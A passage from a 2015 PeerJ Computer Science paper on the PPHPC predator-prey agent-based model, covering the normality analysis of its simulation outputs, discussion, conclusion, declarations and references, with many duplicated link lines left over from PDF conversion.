situation is notably different for the second parameter set, where minimum mean prey energy can occur at several different iterations centered around iteration 88. Distribution seems to be binomial or Poisson-like. E s i ss . Although the histograms are not very clear, the Q–Q plots and the p-values from the SW test suggest that this FM follows a normal distribution. Sss(E s i ). This FM does not seem to stray much from normality, except in the case of 1,600@1 and 200@2, which are affected by outliers. The tendency for the steady-state sample standard deviation statistic to show positive skewness is again confirmed with these observations (800@1 being the exception). Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 20/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36 maxE w i . The maximum of mean predator energy follows an approximately normal distribution, though for 100@1 there are a few replications which produce unexpected results. arg maxE w i . In most cases, this FM approximately follows a normal distribution. There are several exceptions though. For the second parameter set and sizes above 400, the FM starts to display its discrete behavior, following a Poisson-like distribution. Less critically, an outlier “ruins” normality for 100@1. minE w i . Apart from a few outliers with some parameter combinations, this FM generally seems to follow a normal distribution. arg minE w i . Perhaps with the exception of 100@1 and 200@1, the iteration where the minimum of mean predator energy occurs seems best described with a discrete, Poisson-like distribution. E w i ss . This FM generally follows a normal distribution. However, 1,600@1 shows a salient second peak (to the right of the histogram, also visible in the Q–Q plot), affecting the resulting SW p-value, which is below the 1% significance threshold. Sss(E w i ). This FM follows a positively skewed unimodal distribution, in the same line as the steady-state sample standard deviation of other outputs. Note the outlier in 200@2, also observed for the Sss(Pwi ) FM, which is to be excepted as both FMs are related to predator dynamics. maxCi. The samples representing the maximum of the mean C state variable are most likely drawn from a normal distribution. Most histograms are fairly symmetric (which is corroborated by the low skewness values), the Q–Q plots are generally linear, and the SW p-value never drops below 0.05 significance. arg maxCi. For smaller model sizes this FM follows a mostly normal distribution, but as with other iteration-based FMs, the underlying discreteness of the distribution starts to show at larger model sizes, especially for the second parameter set. minCi. For most size@set combinations, the minimum of the mean C state variable seems to be normally distributed. Nonetheless, a number of observations for 400@2 yield unexpected values, making the respective distribution bimodal and distorting its normality (though the respective SW p-value does not drop below 0.05). arg minCi. As in some previous cases, this FM displays different behavior depending on the parameter set. For the first parameter set, practically all observations have the same value, 10, which means the minimum of the mean C state variable is obtained at iteration 10. Only model sizes 100 and 200 have some observations representing iterations 11 and/or 12. Parameter set 2 yields a different dynamic, with an average iteration of 216 approximately (except for size 100, which has an average iteration of 373.3 due to a few very Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 21/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36 Table 12 Empirical classification (from 0 to 5) of each FM according to how close it follows the normal distribution for the tested size@set combinations. The last row outlines the overall normality of each statistic. Xi Stat. max0≤i≤m Xi arg max0≤i≤mXi min0≤i≤m Xi arg min0≤i≤mXi X ss Sss Psi ••••• ••⃝⃝⃝ ••◐⃝⃝ ⃝⃝⃝⃝⃝ ••••• ••••◐ Pwi ••••⃝ •◐⃝⃝⃝ ••••• •••⃝⃝ ••••• ••••◐ Pci ••••• ◐⃝⃝⃝⃝ ••••• •••⃝⃝ ••••• ••••◐ E s i ••••⃝ •⃝⃝⃝⃝ ••••• ◐⃝⃝⃝⃝ ••••• ••••◐ E w i ••••• •••⃝⃝ ••••• ◐⃝⃝⃝⃝ ••••• ••••⃝ Ci ••••• ••◐⃝⃝ ••••• ⃝⃝⃝⃝⃝ ••••• ••••◐ Stat. wise ••••◐ ••⃝⃝⃝ ••••◐ •⃝⃝⃝⃝ ••••• ••••◐ distant outliers). While sizes 200 and 400 follow an approximately normal distribution, larger sizes seem more fit to be analyzed using discrete distributions such as Poisson or binomial. Ci ss . This FM follows an approximately normal distribution. While most size/parameter combinations have a few outliers, only for 800@1 is the existing outlier capable of making the SW test produce a p-value below the 5% significance threshold. Sss(Ci). Although passing the SW normality test (p-value > 0.05) in most cases, we again note the positive skewness of the steady-state sample standard deviation samples, suggesting that distributions such as Weibull or Lognormal maybe a better fit. Statistics-wise distribution trends Table 12 summarizes the descriptions given in the previous section. It was built by assigning an empirical classification from 0 to 5 to each FM according to how close it follows the normal distribution for the tested size@set combinations. More specifically, individual classifications were determined by analyzing the information provided in Tables S2.1–S2.10, prioritizing the SW test result (i.e. if the p-value is above 0.01 and/or 0.05) and distributional discreteness (observable in the Q–Q plots). This classification can be used as a guide to whether parametric or non-parametric statistical methods should be used to further analyze the FMs or to compare FMs of different PPHPC implementations. The last row shows the average classification of individual outputs for a given statistic, outlining its overall normality. The max and min statistics yield mostly normal distributions, although care should be taken when the maximum or minimum systematically converge to the same value, e.g., when they occur at iteration zero. Nonetheless, parametric methods seem adequate for FMs drawn from these statistics. The same does not apply to the arg max and arg min statistics, which show a large variety of distributional behaviors (including normality in some cases). Thus, these statistics are better handled with non-parametric techniques. The steady-state mean typically displays distributions very close to normal, probably due to central-limit-theorem type effects, as described by Law (2007) for mean or average-based Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 22/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36/supp-2 http://dx.doi.org/10.7717/peerj-cs.36/supp-2 http://dx.doi.org/10.7717/peerj-cs.36 FMs. Consequently, parametric methods will most likely be suitable for this statistic. Finally, FMs based on the steady-state sample standard deviation display normal-like behavior, albeit with consistently positive skewness; in fact, they are probably better represented by a Weibull or Lognormal distribution. While parametric methods may be used for this statistic, results should be interpreted cautiously. DISCUSSION In this paper, the PPHPC model is completely specified, and an exhaustive analysis of the respective simulation outputs is performed. Regarding the latter, after determining the mean and variance of the several FMs, we opted to study their distributional properties instead of proceeding with the classical analysis suggested by simulation output analysis literature (i.e., the establishment of CIs.). This approach has a number of practical uses. For example, if we were to estimate CIs for FMs drawn from the steady-state mean, we could use t-distribution CIs with some confidence, as these FMs display an approximately normal distribution. If we did the same for FMs drawn from the steady-state sample standard deviation, the Willink (2005) CI would be preferable, as it accounts for the skewness displayed by these FMs. Estimating CIs without a good understanding of the underlying distribution can be misleading, especially if the distribution is multimodal. The approach taken here is also useful for comparing different PPHPC implementations. If we were to compare max or min-based FMs, which seem to follow approximately normal distributions, parametric tests such as the t-test would most likely produce valid conclusions. On the other hand, if we compare arg max or arg min-based FMs, non-parametric tests, such as the Mann-Whitney U test (Gibbons & Chakraborti, 2011), would be more adequate, as these FMs do not usually follow a normal distribution. However, the scope of the PPHPC model is significantly broader. For example, in Fachada et al. (2015b), PPHPC is reimplemented in Java with several user-selectable parallelization strategies. The goal is to clarify which are the best parallelization approaches for SABMs in general. A n-sample statistical test is applied to each FM, for all implemen- tations and strategies simultaneously, in order to verify that these do not yield dissimilar results. In Fachada et al. (2015a), PPHPC is used for presenting a novel model-independent comparison technique which directly uses simulation outputs, bypassing the need of selecting model-specific FMs. The PPHPC model is made available to other researchers via the source code, in addition to the specification presented here. All the data analyzed in this paper is also available as Supplemental Information. PPHPC can be used as a pure computational model without worrying with aspects like visualization and user interfaces, allowing for direct performance comparison of different implementations. CONCLUSION In this paper, we presented PPHPC, a conceptual model which captures important charac- teristics of SABMs. The model was comprehensively described using the ODD protocol, a NetLogo canonical implementation was reported, and simulation outputs were thoroughly studied from a statistical perspective for two parameter sets and several model sizes. While Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 23/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36 many ABMs have been published, proper model description and analysis is lacking in the scientific literature, and thus this paper can be seen as a guideline or methodology to improve model specification and communication in the field. Furthermore, PPHPC aims to be a standard model for research in agent-based modeling and simulation, such as, but not limited to, statistical model comparison techniques, performance comparison of parallel implementations, and testing the influence of different PRNGs on the statistical accuracy of simulation output. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Fundação para a Ciência e a Tecnologia (FCT) projects UID/EEA/50009/2013, UID/MAT/04561/2013 and (P. RD0389) Incen- tivo/EEI/LA0009/2014, and partially funded with grant SFRH/BD/48310/2008, also from FCT. The author Vitor V. Lopes acknowledges the financial support from the Prometeo project of SENESCYT (Ecuador). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Fundação para a Ciência e a Tecnologia (FCT): UID/EEA/50009/2013, UID/MAT/04561/2013, Incentivo/EEI/LA0009/2014, SFRH/BD/48310/2008. SENESCYT: Prometeo project. Competing Interests The authors declare there are no competing interests. Author Contributions • Nuno Fachada conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Vitor V. Lopes conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. • Rui C. Martins analyzed the data, reviewed drafts of the paper. • Agostinho C. Rosa contributed reagents/materials/analysis tools, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: https://github.com/fakenmc/pphpc/tree/netlogo. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/ 10.7717/peerj-cs.36#supplemental-information. Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 24/27 https://peerj.com/computer-science/ https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36#supplemental-information http://dx.doi.org/10.7717/peerj-cs.36 REFERENCES Axtell R, Axelrod R, Epstein JM, Cohen MD. 1996. Aligning simulation models: a case study and results. Computational and Mathematical Organization Theory 1(2):123–141 DOI 10.1007/BF01299065. Bigbee A, Cioffi-Revilla C, Luke S. 2007. Replication of sugarscape using MASON. In: Terano T, Kita H, Deguchi H, Kijima K, eds. Agent-based approaches in economic and social complex systems IV, Springer series on agent based social systems, vol. 3. Tokyo: Springer, 183–190. Brown LD, Cai TT, DasGupta A. 2001. Interval estimation for a binomial proportion. Statistical Science 16(2):101–117. D’Souza R, Lysenko M, Rahmani K. 2007. Sugarscape on steroids: simulating over a million agents at interactive rates. In: Proceedings of agent 2007 conference, Chicago, USA. Available at http:// www.me.mtu.edu/∼rmdsouza/Papers/2007/SugarScape GPU.pdf. Edmonds B, Hales D. 2003. Replication, replication and replication: some hard lessons from model alignment. Journal of Artificial Societies and Social Simulation 6(4):11. Epstein J, Axtell R. 1996. Growing artificial societies: social science from the bottom up. Cambridge: MIT Press. Fachada N. 2008. Agent-based simulation of the immune system. Master’s thesis, Instituto Superior Técnico, Universidade Técnica de Lisboa, Lisboa. Fachada N, Lopes VV, Martins RC, Rosa AC. 2015a. Model-independent comparison of simulation output. ArXiv preprint. arXiv:1509.09174. Fachada N, Lopes VV, Martins RC, Rosa AC. 2015b. Parallelization strategies for spatial agent-based models. ArXiv preprint. arXiv:1507.04047. Gibbons JD, Chakraborti S. 2011. Nonparametric statistical inference. New York: Springer. Ginovart M. 2014. Discovering the power of individual-based modelling in teaching and learning: The study of a predator-prey system. Journal of Science Education and Technology 23(4):496–513 DOI 10.1007/s10956-013-9480-6. Goldsby ME, Pancerella CM. 2013. Multithreaded agent-based simulation. In: Proceedings of the 2013 winter simulation conference: simulation: making decisions in a complex world, WSC’13. Washington, D.C.: IEEE Press, 1581–1591. Grimm V, Berger U, DeAngelis D, Polhill J, Giske J, Railsback S. 2010. The ODD protocol: a review and first update. Ecological Modelling 221(23):2760–2768 DOI 10.1016/j.ecolmodel.2010.08.019. Helbing D, Balietti S. 2012. How to do agent-based simulations in the future: from modeling social mechanisms to emergent phenomena and interactive systems design. In: Social self-organization, Agent-based modeling. New York: Springer, 25–70. Hiebeler D. 1994. The Swarm simulation system and individual-based modeling. SFI Working Paper: 1994-11-065. Isaac AG. 2011. The ABM template models: A reformulation with reference implementations. Journal of Artificial Societies and Social Simulation 14(2):5 DOI 10.18564/jasss.1749. Kahn K. 2007. Comparing multi-agent models composed from micro-behaviours. In: Rouchier J, Cioffi-Revilla C, Polhill G, Takadama K, eds. M2M 2007: third international model-to-model workshop, Marseilles, France. Kelton WD. 1997. Statistical analysis of simulation output. In: Proceedings of the 29th conference on winter simulation, WSC’97. Piscataway: IEEE Computer Society, 23–30. Law AM. 1983. Statistical analysis of simulation output data. Operations Research 31(6):983–1029 DOI 10.1287/opre.31.6.983. Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 25/27 https://peerj.com/computer-science/ http://dx.doi.org/10.1007/BF01299065 http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://www.me.mtu.edu/~rmdsouza/Papers/2007/SugarScape_GPU.pdf http://arxiv.org/abs/1509.09174 http://arxiv.org/abs/1507.04047 http://dx.doi.org/10.1007/s10956-013-9480-6 http://dx.doi.org/10.1016/j.ecolmodel.2010.08.019 http://dx.doi.org/10.18564/jasss.1749 http://dx.doi.org/10.1287/opre.31.6.983 http://dx.doi.org/10.7717/peerj-cs.36 Law AM. 2007. Statistical analysis of simulation output data: the practical state of the art. In: Simulation conference, 2007 winter. Piscataway: IEEE, 77–83. Law AM. 2015. Simulation modeling and analysis. 5th edition. New York: McGraw-Hill. Lotka A. 1925. Elements of physical biology. Philadelphia: Lippincott Williams and Wilkins. Lysenko M, D’Souza R. 2008. A framework for megascale agent based model simulations on graphics processing units. Journal of Artificial Societies and Social Simulation 11(4):10. Lytinen SL, Railsback SF. 2012. The evolution of agent-based simulation platforms: a review of NetLogo 5.0 and ReLogo. In: Proceedings of the fourth international symposium on agent-based modeling and simulation, Vienna, Austria. Available at http://www2.econ.iastate.edu/tesfatsi/ NetLogoReLogoReview.LytinenRailsback2012.pdf. Macal CM, North MJ. 2008. Agent-based modeling and simulation: ABMS examples. In: Proceedings of the 40th conference on winter simulation, WSC’08. Williston: Winter Simulation Conference Foundation, 101–112. Macal C, North M. 2010. Tutorial on agent-based modelling and simulation. Journal of Simulation 4(3):151–162 DOI 10.1057/jos.2010.3. Martin BT, Zimmer EI, Grimm V, Jager T. 2012. Dynamic energy budget theory meets individual-based modelling: a generic and accessible implementation. Methods in Ecology and Evolution 3(2):445–449 DOI 10.1111/j.2041-210X.2011.00168.x. Merlone U, Sonnessa M, Terna P. 2008. Horizontal and vertical multiple implementations in a model of industrial districts. Journal of Artificial Societies and Social Simulation 11(2):5. Müller B, Balbi S, Buchmann CM, de Sousa L, Dressler G, Groeneveld J, Klassert CJ, Le QB, Millington JDA, Nolzen H, Parker DC, Polhill JG, Schlüter M, Schulze J, Schwarz N, Sun Z, Taillandier P, Weise H. 2014. Standardised and transparent model descriptions for agent-based models: Current status and prospects. Environmental Modelling & Software 55:156–163 DOI 10.1016/j.envsoft.2014.01.029. Nakayama MK. 2008. Statistical analysis of simulation output. In: Proceedings of the 40th conference on winter simulation, WSC’08. Williston: Winter Simulation Conference Foundation, 62–72. Ottino-Loffler J, Rand W, Wilensky U. 2007. Co-evolution of predators and prey in a spatial model. In: GECCO 2007. New York: SIGEVO. Park HM. 2008. Univariate analysis and normality test using SAS, Stata, and SPSS. Working Paper. The University Information Technology Services (UITS) Center for Statistical and Mathematical Computing, Indiana University. Available at http://education.exeter.ac.uk/download.php? id=10414. Radax W, Rengs B. 2010. Prospects and pitfalls of statistical testing: Insights from replicating the demographic prisoner’s dilemma. Journal of Artificial Societies and Social Simulation 13(4):1 DOI 10.18564/jasss.1634. Railsback S, Lytinen S, Grimm V. 2005. StupidModel and extensions: a template and teaching tool for agent-based modeling platforms. Seattle: Swarm Development Group. Railsback S, Lytinen S, Jackson S. 2006. Agent-based simulation platforms: review and development recommendations. Simulation 82(9):609–623 DOI 10.1177/0037549706073695. Razali NM, Wah YB. 2011. Power comparisons of Shapiro-Wilk, Kolmogorov-Smirnov, Lilliefors and Anderson-Darling tests. Journal of Statistical Modeling and Analytics 2(1):21–33. Reynolds C. 2006. Big fast crowds on PS3. In: Proceedings of the 2006 ACM SIGGRAPH symposium on videogames, sandbox’06. New York: ACM, 113–121. Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 26/27 https://peerj.com/computer-science/ http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf 